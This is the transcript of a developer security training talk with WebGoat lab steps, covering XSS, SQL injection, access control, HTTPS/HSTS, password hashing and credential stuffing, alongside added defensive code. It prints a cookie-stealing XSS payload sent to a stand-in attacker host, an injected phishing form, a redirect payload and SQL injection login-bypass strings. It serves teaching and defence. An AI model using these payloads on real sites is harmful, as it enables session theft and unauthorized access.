Devbeat Conference - Developer First Security
Topics include:

- Sample and Demo of Top Application Risks
  — Cross Site Scripting, SQL Injection, Access Control
- Who’s Monitoring Your Traffic?
  — Encrypting in Transit
- Secure Data Storage & Protection
  — Correct Password Storage & Data Protection
- Growing Threats Plaguing Applications

Published in: Technology, Business
Transcript

  • 1. Developer-first security: Integrating Security into Development. Michael Coates, michael@ShapeSecurity.com, michael-coates.blogspot.com, @_mwc
  • 2. About Me michael@shapesecurity.com
  • 3. Reality
  • 4. “The global cost of cybercrime is greater than the combined effect on the global economy of trafficking in marijuana, heroin and cocaine” Sources: http://www.theregister.co.uk/2011/09/07/cost_is_more_than_some_drug_trafficking and http://uk.norton.com/content/en/uk/home_homeoffice/html/cybercrimereport/
  • 5. Data Loss & Breaches datalossdb.org Verizon Data Breach Report 2013
  • 6. Outside Attackers datalossdb.org Verizon Data Breach Report 2013
  • 7. Security - Into The Details
 • Sample and Demo of Top Application Risks
 — Cross Site Scripting, SQL Injection, Access Control
 • Who’s Monitoring Your Traffic?
 — Encrypting in Transit
 • Secure Data Storage & Protection
 — Correct Password Storage & Data Protection
 • Growing Threats Plaguing Applications
  • 8. WARNING Security Testing is ILLEGAL ON UNAUTHORIZED SYSTEMS
  • 9. 3 Dangerous Vulnerabilities: Cross Site Scripting, SQL Injection, Access Control
  • 10. What are Web Requests? Open a console & enter the following:
 telnet google.com 80
 GET / HTTP/1.1
 • Hit return 2 times
  • 11. Cross Site Scripting (XSS)
 • Problem: User controlled data returned in HTTP response contains HTML/JavaScript code
 • Impact: Session Hijacking, Full Control of Page, Malicious Redirects
 • Basic XSS Test:
 "><script>alert(document.cookie)</script>
 • Cookie Theft Example:
 "><script>document.location='http://attackersite/'+document.cookie</script>
  • 12. XSS Behind The Scenes
 URL: http://shinypage.com?user=Bob
 JSP Code (HTML Source): <h1>Glad to see you <%= request.getParameter("name") %></h1>
 Rendered HTML: <div>Glad to see you <b>Bob</b></div>
  • 13. XSS Behind The Scenes
 URL: http://shinypage.com?user=friend</b>
 <br><form method="post" action="badsite.com/login">
 Login: <input type="text" name="username"><br>
 Password:<input type="password" name="password">
 <input type="submit" value="Submit" /></form>
  • 14. XSS - Injecting HTML Rendered HTML
  • 15. Cross Site Scripting
 • Cross Site Scripting typically uses JavaScript to do bad things
 • Steal session cookies: <script>alert(document.cookie)</script>
 • Redirect to bad pages: <script>window.location = "http://evilsite.com/"</script>
 • Rewrite page on the fly
  • 16. Lab! - Reflected XSS
  • 17. Reflected XSS Lab • Lesson: Cross-Site Scripting->Reflected XSS Attacks • Proxy Not Needed
  • 18. Lab! - Stored XSS
  • 19. Stored XSS Lab • Lesson: Cross-Site Scripting>Stored XSS Attacks • Proxy Not Needed
  • 20. XSS Prevention
 • Solution
 1. Output Encoding - converts command characters to benign characters for display
 2. Input Validation
 <h1>Glad to see you <%= encodeForHTML( request.getParameter("name") ) %></h1>
 HTML Encoding: < becomes &lt;, > becomes &gt;, " becomes &quot;, ' becomes &#x27;, & becomes &amp;
  • 21. XSS Attempt Revisited
 URL: http://shinypage.com?user=friend</b>
 <br><form method="post" action="badsite.com/login">
 Login: <input type="text" name="username"><br>
 Password:<input type="password" name="password">
 <input type="submit" value="Submit" /></form>
  • 22. Safe Handling - Rendered HTML (the injected markup is displayed as literal text, not interpreted):
 Glad to see you friend</b>
 <br><form method="post" action="badsite.com/login">
 Login: <input type="text" name="username"><br>
 Password:<input type="password" name="password">
 <input type="submit" value="Submit" /></form>
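Output encoding from slides 20-22, as an added example in Python (not code from the slides): the raw rendering from slide 12 beside the encoded one, run over a constructed input modelled on the slide 13 payload. The encoding table is the one the slide lists; the function names are assumptions.

```python
# Added example (not from the slides): HTML output encoding for the
# "Glad to see you <user>" page. Encodes the five characters slide 20
# lists (< > " ' &) before they reach the response.
HTML_ENCODE = {
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#x27;",
}

def encode_for_html(value: str) -> str:
    """Replace HTML command characters with entities; everything else passes through."""
    return "".join(HTML_ENCODE.get(ch, ch) for ch in value)

def render_greeting(user: str) -> str:
    """Vulnerable rendering (slide 12): the raw parameter is concatenated into HTML."""
    return f"<h1>Glad to see you {user}</h1>"

def render_greeting_safe(user: str) -> str:
    """Fixed rendering (slide 20): the parameter is HTML-encoded first."""
    return f"<h1>Glad to see you {encode_for_html(user)}</h1>"

# Constructed input modelled on the slide 13 payload: a login form injected
# through the user parameter.
PAYLOAD = ('friend</b><br><form method="post" action="badsite.com/login">'
           'Login: <input type="text" name="username"></form>')

def contains_markup(html: str) -> bool:
    """Crude check used only to show whether the injected tags survived as tags."""
    return "<form" in html or "<input" in html

if __name__ == "__main__":
    print(render_greeting(PAYLOAD))       # injected form is live markup
    print(render_greeting_safe(PAYLOAD))  # injected form is inert text
```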
  • 23. XSS Resources
 • OWASP XSS Prevention Cheat Sheet - http://bit.ly/XSS-OWASP
 • Content Security Policy - http://bit.ly/CSP-OWASP
 • OWASP XSS Overview - http://bit.ly/OWASPXSS
  • 24. SQL Injection
 • Problem: User controlled data improperly used with SQL statements
 • Impact: Arbitrary SQL Execution, Data Corruption, Data Theft
 • Basic SQL Injection Tests:
 OR 1=1 --
 ' OR '1'='1'--
 • Example Vulnerable Query:
 sqlQ = "Select user from UserTable where name= '" + username + "' and pass = '" + password + "'"
  • 25. Lab! - SQL Lesson
  • 26. SQL Injection • Lesson: Injection Flaws -> Lab: SQL Injection -> Stage 1: String SQL Injection • Proxy Needed • Objective: Bypass the login page by inserting “control” characters. Login as “Neville” w/o knowledge of the password
  • 27. SQL Injection
 • HTTP Post: employee_id=112&password=x' OR '1'='1&action=Login
 • Vulnerable SQL: Select user from UserTable where name= '" + username + "' and pass = '" + password + "'
 • Resulting Statement: Select user from UserTable where name= '112' and pass = 'x' OR '1'='1'
 • Result: ... name = '112' and pass = 'x' OR TRUE
  • 28. SQL Injection
 • Parameterized Queries
 No confusion with control characters
 Example: would look for a password of ' or '1'='1
 • Input Validation
 Are special characters needed for most fields?
 What about non-printable characters %00-%0A?
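The slide 27 login query built both ways, as an added Python example (not code from the slides): string concatenation beside a parameterized query, run against a constructed in-memory SQLite table. The row values and the function names are assumptions; the injected password is the one on slide 27.

```python
import sqlite3

# Added example (not from the slides): the slide 27 query built two ways.
# Constructed in-memory table; the row values are sample data.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE UserTable (user TEXT, name TEXT, pass TEXT)")
    conn.execute("INSERT INTO UserTable VALUES ('Neville', '112', 'sup3r-s3cret')")
    conn.commit()
    return conn

def login_concat(conn, username: str, password: str):
    """Vulnerable: the slide's string-built query. Quote characters in the
    input become part of the SQL, so AND/OR precedence makes the WHERE true."""
    sql = ("SELECT user FROM UserTable WHERE name = '" + username +
           "' AND pass = '" + password + "'")
    return conn.execute(sql).fetchone()

def login_param(conn, username: str, password: str):
    """Fixed (slide 28): parameterized query. Values travel separately from
    the statement, so x' OR '1'='1 is simply looked up as a password."""
    sql = "SELECT user FROM UserTable WHERE name = ? AND pass = ?"
    return conn.execute(sql, (username, password)).fetchone()

# The password value from the slide 27 POST body.
INJECTED_PASSWORD = "x' OR '1'='1"

def demo():
    """Returns (concatenated result, parameterized result, correct-credentials result)."""
    conn = make_db()
    return (login_concat(conn, "112", INJECTED_PASSWORD),
            login_param(conn, "112", INJECTED_PASSWORD),
            login_param(conn, "112", "sup3r-s3cret"))

if __name__ == "__main__":
    vuln, fixed, legit = demo()
    print("concatenated:  ", vuln)   # row returned without knowing the password
    print("parameterized: ", fixed)  # None
    print("correct creds: ", legit)  # row returned
```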

  • 29. SQL Injection Resources • https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
  • 30. Access Control
 • Problem: Developers assume some parts of app can’t be seen, tampered with or invoked by the user
 • Impact: Unauthorized data access, access to privileged functionality
 • Basic Access Control Test: Inspect HTTP requests - iterate numbers, guess other values for arguments
 • Access Control Failure Example:
 http://somebadbank.com/showacct?id=101
 http://somebadbank.com/showacct?id=102

  • 31. Lab! - Access Control
  • 32. Access Control Violation
 • Lesson: Access Control Flaws>LAB: Role Based Access Control->Stage 1: Bypass Business Layer Access Control
 • Proxy Needed
 • Objective: Find a way to execute “delete” functionality using Tom’s account. Delete account “tom”
  • 33. Access Control Violation
 • Hint: Login with Tom and perform available actions (search staff, view profile). Figure out how the action name is sent to the server:
 POST /webgoat/attack?Screen=43&menu=200 HTTP/1.1
 Host: localhost

 employee_id=105&action=ViewProfile
  • 34. Strong Access Controls
 • Access Control Performed Server Side
 • Never Relies Upon “Security by Obscurity”
 • Be Careful with Identifiers (e.g. id=123)
 • Attacker Can Send Anything in Request
 • Presentation Layer Controls Can Not Enforce Access Control
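Server-side checks for the two failure cases on slides 30 and 32-34, as an added Python example (not code from the slides or from WebGoat): an ownership check on the account id from the URL, and a role lookup on the action name from the POST body. Account ids, names, roles and the action vocabulary are constructed sample data.

```python
# Added example (not from the slides): server-side access control.
# All tables below are constructed sample data.
ACCOUNTS = {101: "alice", 102: "bob"}           # showacct?id=... -> owner
ROLE_ACTIONS = {                                 # what each role may invoke
    "employee": {"SearchStaff", "ViewProfile"},
    "hr":       {"SearchStaff", "ViewProfile", "DeleteProfile"},
}
STAFF = {105: ("tom", "employee"), 112: ("neville", "hr")}

class Forbidden(Exception):
    """Raised when the authenticated principal may not perform the request."""

def show_account(session_user: str, account_id: int) -> str:
    """Slide 30: the id in the URL is attacker-controlled, so the server
    checks that the account belongs to the logged-in user, never trusting
    that an id is "unguessable"."""
    owner = ACCOUNTS.get(account_id)
    if owner is None or owner != session_user:
        # Same response for "missing" and "not yours": iterating ids
        # learns nothing about which accounts exist.
        raise Forbidden(f"{session_user} may not view account {account_id}")
    return f"account {account_id} for {owner}"

def perform_action(session_employee_id: int, action: str) -> str:
    """Slides 32-34: the action name in the POST body is attacker-controlled.
    Hiding the Delete button in the page enforces nothing; the role lookup
    here, keyed on the server-side session, is what decides."""
    name, role = STAFF[session_employee_id]
    if action not in ROLE_ACTIONS.get(role, set()):
        raise Forbidden(f"{name} ({role}) may not invoke {action}")
    return f"{name} performed {action}"

def attempt(fn, *args) -> str:
    """Returns 'allowed' or 'denied' so the outcome is easy to assert on."""
    try:
        fn(*args)
        return "allowed"
    except Forbidden:
        return "denied"

if __name__ == "__main__":
    print(attempt(show_account, "alice", 102))        # denied
    print(attempt(perform_action, 105, "DeleteProfile"))  # denied
```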
  • 35. Access Control Resources • https://www.owasp.org/index.php/Access_Control_Cheat_Sheet
  • 36. Who’s Monitoring Your Traffic?
  • 37. Insecure Session Management
 • Secure login over HTTPS (https://site.com/login)
 • Password submitted encrypted
 • Immediate redirect to HTTP (http://site.com/profile)
 • Session ID sent cleartext <-- vulnerability point
  • 38. Vulnerable Redirects
 • User requests HTTP page, response redirects to HTTPS
 • 302 Response is HTTP <-- Vulnerability Point
  • 39. Secure Design for Communication
 • Use HTTPS Throughout Web Site
 • HTTP Strict Transport Security (HSTS)
 • Opt-in security control
 • Website instructs compatible browser to enable STS for site
 • HSTS Forces (for enabled site):
 • All communication over HTTPS
 • No insecure HTTP requests sent from browser
 • No option for user to override untrusted certificates
  • 40. Strict Transport Security
 • Browser prevents HTTP requests to HSTS site
 • Any request to site is “upgraded” to HTTPS
 • No clear text HTTP traffic ever sent to HSTS site
 • Browser assumes HTTPS for HSTS sites
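The response-side rules from slides 37-40 in one place, as an added Python example (not code from the slides): redirect anything arriving over HTTP, emit the Strict-Transport-Security header on every HTTPS response, and never set the session cookie without the Secure flag. The request/response dicts are a constructed stand-in for a web framework; the max-age value is an assumption.

```python
from typing import Optional

# Added example (not from the slides). Header name and cookie flags are the
# real ones; the max-age value below is an assumption (one year, in seconds).
HSTS_MAX_AGE = 31536000

def build_response(scheme: str, host: str, path: str,
                   session_id: Optional[str] = None) -> dict:
    """Return {'status', 'headers'} for a request to <scheme>://<host><path>."""
    if scheme != "https":
        # Slide 38: never serve application content over HTTP; redirect to
        # HTTPS and send no cookie. This first redirect still travels in
        # clear text, which is why HSTS below exists for repeat visitors.
        return {"status": 301,
                "headers": {"Location": f"https://{host}{path}"}}
    headers = {
        # Slides 39-40: a compatible browser upgrades every later http://
        # request to this host (and subdomains) for max-age seconds.
        "Strict-Transport-Security": f"max-age={HSTS_MAX_AGE}; includeSubDomains",
    }
    if session_id is not None:
        # Slide 37: the session id must never ride on an HTTP request.
        # Secure = browser only sends it over HTTPS; HttpOnly = page script
        # cannot read it, so the slide 11 cookie-theft payload gets nothing.
        headers["Set-Cookie"] = f"SESSIONID={session_id}; Secure; HttpOnly; Path=/"
    return {"status": 200, "headers": headers}
```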
  • 41. Secure Data Storage & Protection
  • 42. Password Storage
 • Bad Approaches: Your own algorithm • md5 encryption • base64 encoding • rot 13 • sha1
 • Good Approach: PBKDF2 • Bcrypt • + Per User Salt
  • 43. What Are We Protecting? Correct password hashing protects against:
 • Offline attacks of password repository
 • Brute Force, Rainbow Attacks
 Does not address:
 • Guessing easy passwords
 • Password theft, disclosure
 • Session Hijacking
 • Credential Stuffing
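Slide 42's "good approach" as an added Python example (not code from the slides): PBKDF2 with a random per-user salt and a constant-time comparison on verification. The iteration count and the stored-record format are assumptions; bcrypt, which the slide also recommends, needs a third-party package and is not shown.

```python
import hashlib
import hmac
import os
from typing import Optional

# Added example (not from the slides). Iteration count is an assumption;
# tune it so one hash takes on the order of 100 ms on your hardware.
ITERATIONS = 600_000

def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Return a record 'pbkdf2_sha256$<iterations>$<salt hex>$<hash hex>'.
    A fresh 16-byte salt is drawn per call, i.e. per user."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"

def verify_password(password: str, stored: str) -> bool:
    """Recompute with the salt and iteration count stored in the record and
    compare in constant time, so timing does not leak how many bytes matched."""
    algo, iters, salt_hex, hash_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(digest.hex(), hash_hex)

def same_password_different_records(password: str) -> bool:
    """Slide 42's reason for a per-user salt: two users who chose the same
    password get different stored values, so a precomputed (rainbow) table
    or one cracked record does not reveal the other user's password."""
    return hash_password(password) != hash_password(password)
```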
  • 44. Architecture for Sensitive Data (diagram): https://site.com -> web server -> internal SSL -> database. Monitor Database Queries & Response Size
  • 45. Encrypting Sensitive Data in Database (diagram: user data is encrypted with a Customer/Group Encryption Key; that key is stored in the database encrypted under a Key Encrypting Key held in a Hardware Security Module, which decrypts it when needed)
 • Encryption within Database
 • Unique keys per data region
 • Key encrypting keys
 • Hardware Security Modules
  • 46. Growing Threats Plaguing Applications
  • 47. Denial of Service: Denial of Service (DOS), Distributed Denial of Service (DDOS)
  • 48. Denial of Service
 • Network DDOS: Exhaust Network Bandwidth
 • Application Layer DDOS (e.g. site.com/generateReport): Exhaust Server CPU/Memory
  • 49. Application Denial of Service
 Traditional Network DDOS:
 • overwhelms target with volume
 • exhausts bandwidth / capacity of network devices
 • Requires large number of machines
 • Defenses: CDN, anti-DDOS services
 Application DDOS:
 • invokes computationally intense application functions
 • exhausts CPU / memory of web servers
 • Requires few machines
 • Defenses: Few available, must customize
  • 50. Credential Stuffing (diagram): credentials on a compromised server (joe: abc123, sue: password1, bob: MyP0n3y) become Stolen Credentials, which are then replayed against https://site.com/login (sue:password1, joe: abc123)
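A detector for the slide 50 pattern, as an added Python example (not code from the slides): one source replaying many different stolen username/password pairs against the login page. The log format, the addresses and the threshold are constructed assumptions; a real deployment would read the same fields from its own access log.

```python
import re
from collections import defaultdict

# Added example (not from the slides). Constructed login log: 10.0.0.7 tries
# six different accounts (some succeed, as stolen credentials often do);
# 192.168.1.4 is one user retyping their own password.
LOG = """\
10.0.0.7 POST /login user=joe result=fail
10.0.0.7 POST /login user=sue result=success
10.0.0.7 POST /login user=bob result=fail
10.0.0.7 POST /login user=ann result=fail
10.0.0.7 POST /login user=raj result=fail
10.0.0.7 POST /login user=kim result=fail
192.168.1.4 POST /login user=alice result=fail
192.168.1.4 POST /login user=alice result=fail
192.168.1.4 POST /login user=alice result=success
"""
LINE = re.compile(r"^(\S+) POST /login user=(\S+) result=(\w+)$")

def login_attempts(log: str):
    """Yield (source, user, succeeded) tuples from the constructed log format."""
    for line in log.splitlines():
        m = LINE.match(line)
        if m:
            yield m.group(1), m.group(2), m.group(3) == "success"

def stuffing_sources(log: str, min_users: int = 5) -> dict:
    """Return {source: number of distinct usernames tried} for every source
    that attempted at least min_users different accounts. Counting distinct
    accounts, not failures, is what separates a stuffing run (which slide 43
    notes password hashing cannot stop) from a forgetful legitimate user."""
    users_by_src = defaultdict(set)
    for src, user, _ok in login_attempts(log):
        users_by_src[src].add(user)
    return {s: len(u) for s, u in users_by_src.items() if len(u) >= min_users}

if __name__ == "__main__":
    print(stuffing_sources(LOG))   # only 10.0.0.7 is flagged
```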
  • 51. Take Aways
 • Understand top security threats and anticipate potential malicious use of the application to design secure code
 • Multiple controls possible to protect sensitive data in transit and storage
 • Understand emerging threats to plan for appropriate defenses
 • Use the OWASP BWA Security Lab and learn more!
  • 52. Thanks! michael@ShapeSecurity.com http://michael-coates.blogspot.com @_mwc
  • 53. Virtual Security Training Lab Setup
  • 54. Software
 • Vulnerable Server: OWASP’s WebGoat
 • Proxy Tool: OWASP’s ZAP (Zed Attack Proxy)
 • Browser
 • Virtual Machine: OWASP Broken Web App VM
  • 55. Test Connectivity to VM
 1. Open Browser
 2. Browse to your VM ip (listed in VM login page), e.g. http://192.168.56.101
 3. Should see OWASP BWA welcome page
 4. Error? Check ip address of VM
  • 56. WebGoat • Click First Link - OWASP WebGoat version 5.3.x • Username / Password is guest / guest
  • 57. Understanding the Proxy
 • Proxy is a middle-man between browser and web server
 • Assists with traffic manipulation & inspection
 Diagram: Attacker’s Browser -> Web Proxy -> Web Server
  • 58. Understanding the Proxy (diagram): Your Computer (Primary OS) runs the Browser and the Web Proxy; the VM runs the Web Server
  • 59. Enabling Proxy
 1. Open ZAP
 2. Configure Firefox to use proxy
 3. Resend Request
 4. Confirm received by proxy
 5. Forward to web server (vm)
  • 60. Using A Proxy • ZAP - Configure to listen on 8080
  • 61. Set Firefox Proxy
 • Set Firefox proxy to 8080
 • Preferences -> Advanced -> Network -> Settings
 • Set HTTP Proxy
 • Important - clear the “No Proxy for” line
  • 62. Confirm Setup Works
 • Refresh Web Browser
 • Go to ZAP
 • See site in left-hand column
  • 63. Intercepting Traffic
 • Add a “breakpoint” by right clicking on the page and choosing “Break...”
 • Refresh the webpage - it will hang
 • Modify the request as needed, then press the “Continue” button
  • 64. “Hello World” of Proxies
 • Lesson: General->Http Basic
 • Objective:
 • Enter your name into text box
 • Intercept with proxy & change entered name to different value
 • Receive response & observe modified value is reversed
 Diagram: Attacker’s Browser sends "Joe" -> Web Proxy changes it to "Sue" -> Web Server returns "euS" -> Browser displays "euS"
